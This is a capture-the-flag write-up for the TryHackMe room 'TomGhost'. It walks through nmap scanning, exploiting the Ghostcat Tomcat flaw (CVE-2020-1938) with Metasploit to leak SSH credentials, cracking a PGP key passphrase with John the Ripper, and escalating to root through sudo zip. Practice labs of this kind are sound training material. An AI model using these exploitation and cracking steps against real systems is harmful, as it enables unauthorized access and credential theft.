TomGhost
IP: 10.10.74.67
Initial nmap scan:
└─$ nmap 10.10.74.67
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 16:08 EDT
Nmap scan report for 10.10.74.67
Host is up (0.18s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
8009/tcp open ajp13
8080/tcp open http-proxy
nmap -T4 10.10.74.67 -p-
, and while this is running, take a closer look at what we know so far.
nmap -sVC -T4 10.10.74.67 -p22,53,8009,8080 -oN nmap-version.txt
Nmap scan report for 10.10.74.67
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Navigating to :8080 in a browser, it seems that we have a fresh Apache Tomcat server running 9.0.30 which hasn't been fully set up.
Between searchsploit
and Google, I came across a vulnerability known as 'Ghostcat', which seems like the right direction being that this room is titled "tomghost".
With my sights focused on CVE-2020-1938, I came across a write-up and exploit on GitHub: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat/blob/main/CVE-2020-1938.py.
This server is running a vulnerable version and listening on port 8009, so I decided to take a final look with Metasploit.
msfconsole
use auxiliary/admin/http/tomcat_ghostcat
set RHOSTS 10.10.74.67
With these options, we had the following configuration:
msf6 auxiliary(admin/http/tomcat_ghostcat) > options
Module options (auxiliary/admin/http/tomcat_ghostcat):
Name Current Setting Required Description
---- --------------- -------- -----------
AJP_PORT 8009 no The Apache JServ Protocol (AJP) port
FILENAME /WEB-INF/web.xml yes File name
RHOSTS 10.10.74.67 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploi
t/basics/using-metasploit.html
RPORT 8080 yes The Apache Tomcat webserver port (TCP)
SSL false yes SSL
check
, it confirms that the instance is vulnerable.
Finally we'll run
and get the contents of /WEB-INF/web.xml, inside which we find the following output:
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>
</web-app>
skyfuck:8730281lkjlkjdqlksalks
could be a set of credentials, but now I'm having a hard time finding where to input them.
After some research and poking around in the Tomcat documentation for manger portal locations, it turns out these were just SSH credentials!!
In skyfuck
's home directory, we have credential.pgp
and tryhackme.asc
sitting there. tryhackme.asc
contains a PGP private key, which I'm not entirely sure what to do with for now.
Looking around more, we find some hidden files including .bash_history:
skyfuck@ubuntu:~$ cat .bash_history
ls
cd ..
ls
cd skyfuck/
ls
exit
cd ..
ls
cd skyfuck/
ls
wget 192.168.32.23/tryhackme.asc
wget 192.168.32.23/credential.pgp
ls
exot
exit
Checking with sudo -l
we don't have sudo privileges.
With some research, after copying the .pgp and .asc files to my local machine, I was able to use john
to bruteforce the .asc file:
gpg2john tryhackme.asc > tocrack
john tocrack --wordlist=/usr/share/wordlists/rockyou.txt
john tocrack --show
The password is alexandru
.
Now we're able to use this key to decrypt the .pgp file:
gpg --import tryhackme.asc
enter alexandru as the password
gpg --decrypt credential.pgp
enter alexandru as the password again
And now we have merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
from the decrypted file.
Authenticating to the server as merlin with our newfound credentials, we find the user flag is in this home directory.
Now looking for privilege escalation possibilities, sudo -l
reveals that we can run /usr/bin/zip
as root without a password!
This is an immediate red flag to check gtfobins, and sure enough, we're able to get obtain root from there with a copy/paste. https://gtfobins.github.io/gtfobins/zip/#sudo
Lastly, we find and submit the root flag in /root.
This was a fairly straightforward room, but it was great learning a bit about Tomcat and the Ghostcat vulnerability, as well as cracking PGP encryption with John.